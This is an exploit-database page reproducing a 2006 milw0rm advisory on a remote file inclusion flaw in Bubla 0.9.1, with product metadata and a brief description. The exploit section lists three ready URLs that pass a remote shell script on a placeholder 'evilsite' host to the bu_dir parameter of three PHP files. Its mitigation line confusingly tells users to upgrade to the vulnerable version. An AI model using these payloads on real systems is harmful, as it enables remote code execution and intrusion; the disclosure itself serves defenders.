header-logo
Suggest Exploit
vendor:
Bubla 0.9.1
by:
DeltahackingTEAM
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Bubla 0.9.1
Affected Version From: 0.9.1
Affected Version To: 0.9.1
Patch Exists: YES
Related CWE: N/A
CPE: a:bubla:bubla:0.9.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Bubla 0.9.1 Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in Bubla 0.9.1. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. The attacker can send a maliciously crafted HTTP request containing a URL in the bu_dir parameter to the vulnerable script. This can result in arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of Bubla 0.9.1
Source

Exploit-DB raw data:

**********************************************************************************************************
                                              DeltasecurityTEAM
                                              WwW.Deltasecurity.iR
**********************************************************************************************************

* Portal Name = Bubla 0.9.1

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-0.9.1.tar.gz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Conatact = Davood_cracker@yahoo.com

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------

- Exploit:


http://localhost/[PATH]/bu/bu_claro.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_cache.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_parse.php?bu_dir=http://evilsite/Shell.php?
--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************

# milw0rm.com [2006-12-31]

Navigation

Suggest Exploit

Services By CQR